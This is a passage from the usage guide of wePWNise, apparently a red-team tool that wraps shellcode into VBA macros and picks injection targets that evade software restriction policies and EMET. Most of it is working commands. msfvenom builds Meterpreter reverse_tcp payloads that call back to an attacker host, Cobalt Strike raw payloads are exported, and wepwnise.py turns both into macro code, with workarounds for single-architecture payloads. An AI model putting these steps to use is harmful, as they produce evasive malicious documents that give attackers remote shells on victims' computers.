files (binary-paths.txt and directory-paths.txt) that contain a list of executables and directories which are less likely to be monitored to be checked first. By editing the contents of those files the user can define their own choices instead. If the files are empty, wePWNise will directly start reading the SPRs/EMET policies as these would be defined within the Registry and make its injection choice purely based on the retrieved information.
The following sections describe some basic usage examples of wePWNise.
First the payloads for both x86 and x64 architectures in raw format and ensure that the
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=
Then point wePWNise to the generated payloads and direct the output to msf_wepwn.txt
$ wepwnise.py -i86 /payloads/msf86.raw -i64 /payloads/msf64.raw --out /payloads/msf_wepwn.txt
Cobalt Strike payloads
To generate a raw payload in Cobalt Strike, navigate to the following menu and from the Output dropdown select the Raw format. Repeat the process and enable the x64 checkbox to produce a 64-bit payload.
Attacks > Packages > Payload Generator
Enter the generated payloads into wePWNise to generate the VBA code.
$ wepwnise.py -i86 /payloads/cs86.raw -i64 /payloads/cs64.raw --msgbox False --out /payloads/cs_wepwn.txt
In certain cases it may be the case that only an x86 payload be available. As wePWNise expects both a 32-bit and 64-bit payloads, in order to disable 64-bit injection create a dummy 64-bit file and set the –inject64 parameter to False.
$ echo "+" > /payloads/dummy64.raw
$ wepwnise.py -i86 /payloads/custom.raw -i64 /payloads/dummy64.raw --inject64 False --out /payloads/wepwn86.txt
Similarly, to generate 64-bit payloads only, create a dummy x86 file and supply it in wePWNise’s -i86paramenter.